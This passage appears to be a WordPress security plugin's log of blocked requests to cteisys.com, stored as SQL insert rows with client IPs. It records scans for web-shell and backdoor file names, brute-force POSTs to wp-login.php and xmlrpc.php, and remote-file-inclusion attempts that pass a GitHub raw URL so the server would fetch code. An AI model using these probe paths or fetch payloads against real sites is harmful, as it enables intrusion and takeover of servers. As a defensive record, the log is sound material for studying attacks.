Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','kNbvIUpBOGx0nAwaECWf7Lir',0,1663768630.4894,278,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','MhsOweaDGExNVWUSpfr0IXFt',0,1663768631.5574,299,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','MdNGJoUXtD7Cr5HQu4PsYK3m',0,1663768633.0212,320,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Hkhl96mY1WaIjNqTfi4LO735',0,1663768636.0333,327,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','hkO4tMQnYUma2ES7y3IbV8cG',0,1663768637.4317,288,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','6fY0jRwnH3yJDlr1WigEXCbu',0,1663768638.8635,297,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','8yCpXsb1miPMwnDrv3taKo9h',0,1663768645.1373,314,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','7VYHXbnSkUBiP85TNtCjD4hf',0,1663768649.2834,321,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','bHReML8h0dJx9UiGqwjFEO1Y',0,1663768650.4542,345,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','XpGQB0hyaiWFL356S9e7q82E',0,1663768652.8673,305,'','GET',403,0,700,0,1,'',0),('83.150.214.18',1402394130,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','TD9J6y57ZwqPebF4mtjYOU3a',0,1663769219.4426,503,'','POST',403,0,600,0,1,'',0),('83.150.214.18',1402394130,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','OHx9zbhRnmaujKD2Le6s3Glp',0,1663769221.1534,534,'','POST',403,0,600,0,1,'',0),('89.253.233.129',1509812609,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','gEKFhu36q7bjMPADdra0T5RB',0,1663771619.2492,507,'','POST',403,0,600,0,1,'',0),('89.253.233.129',1509812609,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','ld9iwRS7OZqXsvLM3CaJPgrn',0,1663771622.4984,578,'','POST',403,0,600,0,1,'',0),('164.90.170.66',2757405250,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','5kZtoQ8Hb9LcVWG2gnup0YRe',0,1663772047.0773,534,'','POST',403,0,600,0,1,'',0),('164.90.170.66',2757405250,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','5g6XHTNlJsLmwOEIAYvjSf0G',0,1663772048.4272,530,'','POST',403,0,600,0,1,'',0),('15.236.225.141',267182477,'','http://cteisys.com/wp-commentin.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','QI84pNsvPYDH5cg063hmtCoO',0,1663774938.1138,11592,'','GET',403,0,700,0,1,'',0),('15.236.225.141',267182477,'','http://cteisys.com/wp/wp-commentin.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','D7vrLQNfbdg6OAzc9UR4ZCEX',0,1663774951.8033,271,'','GET',403,0,700,0,1,'',0),('15.236.225.141',267182477,'','http://cteisys.com/wordpress/wp-commentin.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','9fFpRQdhTvIlVywCKbr372At',0,1663774954.6154,369,'','GET',403,0,700,0,1,'',0),('15.236.225.141',267182477,'','http://cteisys.com/blog/wp-commentin.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','fGNq3Dr5ag4V6kLMiSxHJjp1',0,1663774959.9230,281,'','GET',403,0,700,0,1,'',0),('15.236.225.141',267182477,'','http://cteisys.com/site/wp-commentin.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','x2wA0YZbB3IKqHrtnogJvcXS',0,1663774962.0272,284,'','GET',403,0,700,0,1,'',0),('51.15.183.168',856668072,'','http://cteisys.com/includes/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/75.0.3770.100 Safari\\/537.36\"}','Tb5WFRVYfK4ioz71ONP3kQ8w',0,1663775124.7565,339,'','GET',403,0,700,0,1,'',0),('184.75.223.227',3091980259,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','tvhKUqzjmDg2PxQ8FOMnrasB',0,1663779537.8941,2150,'','POST',403,0,515,0,1,'',0),('74.205.112.88',1254977624,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','gmpNG0ZPK9yco3HUeRu2MEwx',0,1663784155.9865,482,'','POST',403,0,600,0,1,'',0),('74.205.112.88',1254977624,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','2Mca6V8fuKrylBjZO4WzRbCo',0,1663784156.8098,510,'','POST',403,0,600,0,1,'',0),('213.152.162.154',3583550106,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','sGDv3Z4pAMFWi9yfPTxarj5w',0,1663788365.9726,19839,'','POST',403,0,515,0,1,'',0),('5.161.128.226',94470370,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','1B2Mu8xLPrelvqoA7mtcZJSR',0,1663789696.7294,480,'','POST',403,0,515,0,1,'',0),('213.142.149.80',3582891344,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','G7SlThpOYnFc8q4uy2oktiMr',0,1663795687.0375,507,'','POST',403,0,600,0,1,'',0),('213.142.149.80',3582891344,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','8B0qVvoy1teaDG29pS6zNgXQ',0,1663795688.6042,451,'','POST',403,0,600,0,1,'',0),('178.162.204.214',2997013718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','AqhjYLvaeyfJsDRKd459FmWi',0,1663796674.3066,19326,'','POST',403,0,515,0,1,'',0),('82.218.176.68',1390063684,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','MziyBcNUlgJjLm0IeG85hOZA',0,1663801741.6496,648,'','POST',403,0,600,0,1,'',0),('82.218.176.68',1390063684,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','4TefRkmMSihanA2lt7d35Vc9',0,1663801743.1188,581,'','POST',403,0,600,0,1,'',0),('20.168.36.92',346563676,'','http://cteisys.com/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit\\/534.50 (KHTML, like Gecko) Version\\/5.1 Safari\\/534.50\"}','Ao9quzxfgsW34IRyKBdpQJnV',0,1663807583.2717,19845,'','POST',400,0,500,0,1,'',0),('137.63.71.51',2302625587,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','DLA7eG0tU4QcJIVxaZk3iz1F',0,1663813681.8001,19344,'','POST',403,0,515,0,1,'',0),('31.3.152.100',520329316,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','wir2Z8jNQ6kxYen1vusmMbfX',0,1663814070.5243,19501,'','POST',403,0,515,0,1,'',0),('190.92.159.48',3193741104,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3MDTz106OJKp2Ix8AdNjB7om',0,1663842351.8961,1240,'','POST',403,0,515,0,1,'',0),('93.186.115.226',1572500450,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','Z6xhIVd4vq9o7FwrQRYCK2Pj',0,1663842429.9324,495,'','POST',403,0,600,0,1,'',0),('93.186.115.226',1572500450,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','3cCGILQrTDdPS1HJ6B0bKUln',0,1663842432.8636,569,'','POST',403,0,600,0,1,'',0),('152.89.196.13',2556019725,'','https://cteisys.com/s_noeval.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','eXz94nyTmsV3W8vuZfKb6tEr',0,1663842526.8239,301,'','POST',403,0,700,0,1,'',0),('209.141.56.13',3515693069,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident\\/6.0)\"}','2P60lWMw8nugLQX1NkKcStvG',0,1663842680.6231,1365,'','POST',403,0,600,0,1,'',0),('119.8.58.8',1997027848,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','frVnuS6LAqdks9Mexa817bKH',0,1663842787.1084,1586,'','POST',403,0,515,0,1,'',0),('82.165.184.76',1386592332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pMhbkm7S3ZLE2WgryOjHNi8T',0,1663843399.2785,18789,'','POST',403,0,515,0,1,'',0),('190.145.68.131',3197191299,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','9bUtEL0SkvmZQfh2T6yeMgOu',0,1663843524.1215,1258,'','POST',403,0,515,0,1,'',0),('152.89.196.13',2556019725,'','https://cteisys.com/wp-content/uploads/nin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','UTcZ5SGOBsbMKplvDodi2kQe',0,1663843901.5606,327,'','GET',403,0,700,0,1,'',0),('101.0.73.142',1694517646,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NZtxF1v2G0kELmoy4aiPpH6w',0,1663843969.0729,1256,'','POST',403,0,515,0,1,'',0),('177.52.160.29',2973016093,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XKViNQk29qYI81TEwmHdvnoy',0,1663844103.4115,1897,'','POST',403,0,515,0,1,'',0),('153.92.4.20',2572944404,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','2eyiTVD1BJx6uLPta7cq0mSQ',0,1663846409.5146,438,'','POST',403,0,600,0,1,'',0),('153.92.4.20',2572944404,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','7CA6BQy18TczOwJMLFWmbrEt',0,1663846410.9739,548,'','POST',403,0,600,0,1,'',0),('162.215.217.77',2732054861,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Cdp6gUSMYqk84JeAOXo3uNzt',0,1663846458.3460,1309,'','POST',403,0,515,0,1,'',0),('162.14.71.142',2718844814,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VmL8qflRXnpc1ua3NYDstBPO',0,1663846906.7056,1311,'','POST',403,0,515,0,1,'',0),('95.173.161.171',1605214635,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fU81b0ldSVzaCGo52AFpc73P',0,1663847062.7957,1492,'','POST',403,0,515,0,1,'',0),('95.173.161.171',1605214635,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JW6GSzklQdUp0T1H9b5uwetM',0,1663847664.6076,19374,'','POST',403,0,515,0,1,'',0),('152.89.196.13',2556019725,'','https://cteisys.com/sites/default/files/69.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','j0x7IEW5GXBVkpbnHcUPRD2Y',0,1663848158.3964,379,'','GET',403,0,700,0,1,'',0),('65.21.248.218',1091959002,'','https://cteisys.com/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','MN07TyItpDaBHqZGOx1PS28g',0,1663863846.4769,489,'','POST',403,0,600,0,1,'',0),('65.21.248.218',1091959002,'','https://cteisys.com/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','cSsmKZLun1iy2Hjwkr7dWAOR',0,1663863848.0189,535,'','POST',403,0,600,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','54oQVB9vX0CGguRTHYfMlnka',0,1663863907.0512,311,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','duEq0tKWyj7HUQIi6srRXfBb',0,1663863909.4441,298,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','fUsmk25h0BuaMiPKEd9w364Y',0,1663863920.5674,350,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','4lSQYDPeb7hLGIw6Tv3R5VWp',0,1663863922.3599,327,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','o90yd6lTF12vuY7Kg5QMOiUS',0,1663863993.1938,340,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','4roJ2dOY5hWjqH7tKTP0Axyv',0,1663863994.7084,310,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','RpvL12NtdwkHriSIW9TjF37B',0,1663863996.9912,314,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','wLqYEneA9ugsotMkTUmPIirb',0,1663863998.6669,324,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','N5elSgCaIcOBVL1UjFn0H8tu',0,1663864001.4176,327,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','dtsThrC3pkSgA4ZzGXmRV2Jf',0,1663864002.7422,331,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','0y5HYvaEp7TCP1e9MJRDlqQi',0,1663864006.7967,343,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','AWPbul217vpIKUn60YG4thMD',0,1663864009.6131,311,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','s6cIrXlpOaDTmASUM8JVQFj3',0,1663864013.9542,299,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','IMdY9XLa4zkAOplN1BmnPxqH',0,1663864016.8464,371,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','1Lrnx74XqWySj03MYltQdfmI',0,1663864019.3604,295,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','DTQUHCKgoy5up2a39qsIBZzb',0,1663864020.7562,361,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','qmOndzAZte6ahvBpI3wQCcNG',0,1663864026.7169,293,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','18VwaSqXk5ENFnAxslBhtIzK',0,1663864030.3910,294,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 